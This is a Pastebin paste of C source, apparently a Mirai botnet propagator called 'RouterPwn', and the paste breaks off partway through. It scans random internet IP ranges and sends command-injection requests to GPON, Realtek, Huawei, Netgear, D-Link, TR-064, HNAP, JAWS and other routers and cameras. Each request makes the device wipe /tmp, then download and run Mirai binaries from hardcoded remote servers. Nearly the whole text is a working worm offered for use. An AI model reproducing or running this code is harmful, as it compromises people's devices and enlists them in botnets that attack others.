SHARE
TWEET

[RouterPWN][SHIT]

xB4ckdoorREAL Nov 7th, 2018 (edited) 97 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //DISCORD: https://discord.gg/PTW3yPp  skype: b4ckdoor.porn
  2. //RouterPwn Proof of Concept
  3. //Target 12 different router exploits
  4. //Don't forget to edit your payloads
  5.  
  6. #include <stdlib.h>
  7. #include <stdarg.h>
  8. #include <stdio.h>
  9. #include <sys/socket.h>
  10. #include <sys/types.h>
  11. #include <netinet/in.h>
  12. #include <arpa/inet.h>
  13. #include <netdb.h>
  14. #include <signal.h>
  15. #include <strings.h>
  16. #include <string.h>
  17. #include <sys/utsname.h>
  18. #include <unistd.h>
  19. #include <fcntl.h>
  20. #include <errno.h>
  21. #include <netinet/udp.h>
  22. #include <netinet/tcp.h>
  23. #include <sys/wait.h>
  24. #include <sys/ioctl.h>
  25. #include <net/if.h>
  26.  
  27. int GPON1_Range [] = {187,189,200,201,207};
  28. int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212};
  29.  
  30. int exploit_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000;
  31. static uint8_t ipState[40] = {0};
  32. int max = 0, i = 0;
  33.  
  34. int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests
  35. {  
  36.     struct hostent *hp;
  37.     struct sockaddr_in addr;
  38.     int on = 1, sock;    
  39.     struct timeval timeout;      
  40.     timeout.tv_sec = 3; // 3 sec timeout on socket
  41.     timeout.tv_usec = 0;
  42.     if ((hp = gethostbyname(host)) == NULL) return 0;
  43.     bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  44.     addr.sin_port = htons(port);
  45.     addr.sin_family = AF_INET;
  46.     sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  47.     setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
  48.     if (sock == -1) return 0;
  49.     if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  50.     return sock;
  51. }
  52.  
  53.  
  54. void exploit_socket_gpon8080(unsigned char *host)
  55. {
  56.     scanner3_pid = fork();
  57.    
  58.     if (scanner3_pid > 0 || scanner3_pid == -1)
  59.         return;
  60.  
  61.     int gpon_socket1;
  62.     char gpon_request1[1024];
  63.    
  64.     gpon_socket1 = socket_connect_tcp((char *)host, 8080);
  65.    
  66.     sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://188.212.103.208/bins/mirai.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0");
  67.    
  68.     if (gpon_socket1 != 0)
  69.     {
  70.         write(gpon_socket1, gpon_request1, strlen(gpon_request1));
  71.         usleep(200000);
  72.         close(gpon_socket1);
  73.         printf("[Pwn] Found Exploitable Device %s [GPON] [8080]\n", host);
  74.     }
  75.     exit(0);
  76. }
  77.  
  78. void exploit_socket_gpon80(unsigned char *host)
  79. {
  80.     scanner4_pid = fork();
  81.    
  82.     if (scanner4_pid > 0 || scanner4_pid == -1)
  83.         return;
  84.  
  85.     int gpon_socket2;
  86.     char gpon_request2[1024];
  87.    
  88.     gpon_socket2 = socket_connect_tcp((char *)host, 80);
  89.    
  90.     sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://188.212.103.208/bins/mirai.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0");
  91.    
  92.     if (gpon_socket2 != 0)
  93.     {
  94.         write(gpon_socket2, gpon_request2, strlen(gpon_request2));
  95.         usleep(200000);
  96.         close(gpon_socket2);
  97.         printf("[Pwn] Found Exploitable Device %s [GPON] [80]\n", host);
  98.     }
  99.     exit(0);
  100. }
  101.  
  102. void exploit_socket_realtek(unsigned char *host)
  103. {
  104.     scanner5_pid = fork();
  105.    
  106.     if (scanner5_pid > 0 || scanner5_pid == -1)
  107.         return;
  108.  
  109.     int realtek_socket;
  110.     char realtek_request[1024], realtek_request2[1024];
  111.    
  112.     realtek_socket = socket_connect_tcp((char *)host, 52869);
  113.    
  114.     sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/mirai.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  115.     sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x mirai.mips;./mirai.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host);
  116.    
  117.     if (realtek_socket != 0)
  118.     {
  119.         write(realtek_socket, realtek_request, strlen(realtek_request));
  120.         sleep(5);
  121.         write(realtek_socket, realtek_request2, strlen(realtek_request2));
  122.         usleep(200000);
  123.         close(realtek_socket);
  124.         printf("[Pwn] Found Exploitable Device %s [REALTEK] [52869]\n", host);
  125.     }
  126.     exit(0);
  127. }
  128.  
  129. void exploit_socket_netgear(unsigned char *host)
  130. {
  131.     scanner6_pid = fork();
  132.    
  133.     if (scanner6_pid > 0 || scanner6_pid == -1)
  134.         return;
  135.  
  136.     int netgear_socket, netgear_socket2;
  137.     char netgear_request[1024];
  138.    
  139.     netgear_socket = socket_connect_tcp((char *)host, 8080);
  140.     netgear_socket2 = socket_connect_tcp((char *)host, 80);
  141.    
  142.     sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://188.212.103.208/bins/mirai.mips+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n");
  143.  
  144.     if (netgear_socket != 0)
  145.     {
  146.         write(netgear_socket, netgear_request, strlen(netgear_request));
  147.         usleep(200000);
  148.         close(netgear_socket);
  149.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [8080]\n", host);
  150.     }
  151.     if (netgear_socket2 != 0)
  152.     {
  153.         write(netgear_socket2, netgear_request, strlen(netgear_request));
  154.         usleep(200000);
  155.         close(netgear_socket2);
  156.         printf("[Pwn] Found Exploitable Device %s [NETGEAR] [80]\n", host);
  157.     }
  158.     exit(0);
  159. }
  160.  
  161. void exploit_socket_huawei(unsigned char *host)
  162. {
  163.     scanner6_pid = fork();
  164.    
  165.     if (scanner6_pid > 0 || scanner6_pid == -1)
  166.         return;
  167.  
  168.     int huawei_socket;
  169.     char huawei_request[1024];
  170.    
  171.     huawei_socket = socket_connect_tcp((char *)host, 37215);
  172.    
  173.     sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 188.212.103.208 -l /tmp/huawei -r /mirai.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host);
  174.    
  175.     if (huawei_socket != 0)
  176.     {
  177.         write(huawei_socket, huawei_request, strlen(huawei_request));
  178.         usleep(200000);
  179.         close(huawei_socket);
  180.         printf("[Pwn] Found Exploitable Device %s [HUAWEI] [37215]\n", host);
  181.     }
  182.     exit(0);
  183. }
  184.  
  185. void exploit_socket_tr064(unsigned char *host)
  186. {
  187.     scanner7_pid = fork();
  188.    
  189.     if (scanner7_pid > 0 || scanner7_pid == -1)
  190.         return;
  191.  
  192.     int tr064_socket, tr064_socket2;
  193.     char tr064_request[1024], tr064_request2[1024];
  194.    
  195.     tr064_socket = socket_connect_tcp((char *)host, 7574);
  196.     tr064_socket2 = socket_connect_tcp((char *)host, 5555);
  197.    
  198.     sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://188.212.103.208/bins/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  199.     sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://188.212.103.208/bins/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>");
  200.    
  201.     if (tr064_socket != 0)
  202.     {
  203.         write(tr064_socket, tr064_request, strlen(tr064_request));
  204.         usleep(200000);
  205.         close(tr064_socket);
  206.         printf("[Pwn] Found Exploitable Device %s [TR-064] [7574]\n", host);
  207.     }
  208.     if (tr064_socket2 != 0)
  209.     {
  210.         write(tr064_socket2, tr064_request2, strlen(tr064_request2));
  211.         usleep(200000);
  212.         close(tr064_socket2);
  213.         printf("[Pwn] Found Exploitable Device %s [TR-064] [5555]\n", host);
  214.     }
  215.     exit(0);
  216. }
  217.  
  218. void exploit_socket_hnap(unsigned char *host)
  219. {
  220.     scanner8_pid = fork();
  221.    
  222.     if (scanner8_pid > 0 || scanner8_pid == -1)
  223.         return;
  224.  
  225.     int hnap_socket;
  226.     char hnap_request[1024];
  227.    
  228.     hnap_socket = socket_connect_tcp((char *)host, 80);
  229.    
  230.     sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://188.212.103.208/bins/mirai.mips && chmod 777 /tmp/mirai.mips/ && /tmp/mirai.mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host);
  231.  
  232.     if (hnap_socket != 0)
  233.     {
  234.         write(hnap_socket, hnap_request, strlen(hnap_request));
  235.         usleep(200000);
  236.         close(hnap_socket);
  237.         printf("[Pwn] Found Exploitable Device %s [HNAP] [80]\n", host);
  238.     }
  239.     exit(0);
  240. }
  241.  
  242. void exploit_socket_crossweb(unsigned char *host)
  243. {
  244.     scanner9_pid = fork();
  245.    
  246.     if (scanner9_pid > 0 || scanner9_pid == -1)
  247.         return;
  248.  
  249.     int crossweb_socket;
  250.     char crossweb_request[1024];
  251.    
  252.     crossweb_socket = socket_connect_tcp((char *)host, 81);
  253.    
  254.     sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://188.212.103.208/bins/mirai.arm7;sh${IFS}/tmp/mirai.arm7&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n");
  255.  
  256.     if (crossweb_socket != 0)
  257.     {
  258.         write(crossweb_socket, crossweb_request, strlen(crossweb_request));
  259.         usleep(200000);
  260.         close(crossweb_socket);
  261.         printf("[Pwn] Found Exploitable Device %s [CROSSWEB] [81]\n", host);
  262.     }
  263.     exit(0);
  264. }
  265.  
  266. void exploit_socket_jaws(unsigned char *host)
  267. {
  268.     scanner10_pid = fork();
  269.    
  270.     if (scanner10_pid > 0 || scanner10_pid == -1)
  271.         return;
  272.  
  273.     int jaws_socket;
  274.     char jaws_request[1024];
  275.    
  276.     jaws_socket = socket_connect_tcp((char *)host, 80);
  277.    
  278.     sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://188.212.103.208/bins/mirai.arm7;chmod+777+mirai.arm7;/tmp/mirai.arm7+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host);
  279.  
  280.     if (jaws_socket != 0)
  281.     {
  282.         write(jaws_socket, jaws_request, strlen(jaws_request));
  283.         usleep(200000);
  284.         close(jaws_socket);
  285.         printf("[Pwn] Found Exploitable Device %s [JAWS] [80]\n", host);
  286.     }
  287.     exit(0);
  288. }
  289.  
  290. void exploit_socket_dlink(unsigned char *host)
  291. {
  292.     scanner11_pid = fork();
  293.    
  294.     if (scanner11_pid > 0 || scanner11_pid == -1)
  295.         return;
  296.  
  297.     int dlink_socket;
  298.     char dlink_request[1024];
  299.    
  300.     dlink_socket = socket_connect_tcp((char *)host, 49152);
  301.    
  302.     sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://188.212.103.208/bins/mirai.mips;/tmp/mirai.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host);
  303.  
  304.     if (dlink_socket != 0)
  305.     {
  306.         write(dlink_socket, dlink_request, strlen(dlink_request));
  307.         usleep(200000);
  308.         close(dlink_socket);
  309.         printf("Pwn] Found Exploitable Device %s [DLINK] [49152]\n", host);
  310.     }
  311.     exit(0);
  312. }
  313.  
  314. void exploit_socket_r7064(unsigned char *host)
  315. {
  316.     scanner12_pid = fork();
  317.    
  318.     if (scanner12_pid > 0 || scanner12_pid == -1)
  319.         return;
  320.  
  321.     int r7064_socket;
  322.     char r7064_request[1024];
  323.    
  324.     r7064_socket = socket_connect_tcp((char *)host, 8443);
  325.    
  326.     sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://188.212.103.208/bins/mirai.mips;${IFS}sh${IFS}/var/tmp/mirai.mips");
  327.  
  328.     if (r7064_socket != 0)
  329.     {
  330.         write(r7064_socket, r7064_request, strlen(r7064_request));
  331.         usleep(200000);
  332.         close(r7064_socket);
  333.         printf("[Pwn] Found Exploitable Device %s [R7064] [8443]\n", host);
  334.     }
  335.     exit(0);
  336. }
  337.  
  338. void exploit_socket_vacron(unsigned char *host)
  339. {
  340.     scanner13_pid = fork();
  341.    
  342.     if (scanner13_pid > 0 || scanner13_pid == -1)
  343.         return;
  344.  
  345.     int vacron_socket;
  346.     char vacron_request[1024];
  347.    
  348.     vacron_socket = socket_connect_tcp((char *)host, 8080);
  349.    
  350.     sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://188.212.103.208/bins/mirai.arm7;chmod+777+mirai.arm7;/tmp/mirai.arm7+varcron");
  351.  
  352.     if (vacron_socket != 0)
  353.     {
  354.         write(vacron_socket, vacron_request, strlen(vacron_request));
  355.         usleep(200000);
  356.         close(vacron_socket);
  357.         printf("Pwn] Found Exploitable Device %s [VACRON] [8080]\n", host);
  358.     }
  359.     exit(0);
  360. }
  361. void GPON8080_IPGen()
  362. {
  363.     char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0};
  364.     char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0};
  365.    
  366.     srand(time(NULL));
  367.     int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  368.     int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *));
  369.    
  370.     ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3];
  371.     ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6];
  372.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  373.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  374.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  375.    
  376.     sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  377.     sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  378.     sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  379.    
  380.     exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);
  381. }
  382.  
  383. void GPON80_IPGen()
  384. {
  385.     char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};
  386.     char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};
  387.    
  388.     srand(time(NULL));
  389.     int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  390.     int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
  391.    
  392.     ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];
  393.     ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];
  394.     ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
  395.     ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
  396.     ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;
  397.    
  398.     sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  399.     sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  400.     sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  401.    
  402.     exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);
  403. }
  404.  
  405. void REALTEK_IPGen()
  406. {  
  407.     char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};
  408.     char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};
  409.  
  410.     srand(time(NULL));
  411.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  412.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  413.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  414.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  415.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  416.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
  417.     ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
  418.     ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;
  419.    
  420.     sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
  421.     sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
  422.     sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
  423.     sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
  424.     sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);
  425.    
  426.     exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);
  427.     exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);
  428. }
  429.  
  430. void NETGEAR_IPGen()
  431. {  
  432.     char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};
  433.     char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};
  434.  
  435.     srand(time(NULL));
  436.     ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
  437.     ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
  438.     ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
  439.     ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
  440.     ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
  441.     ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
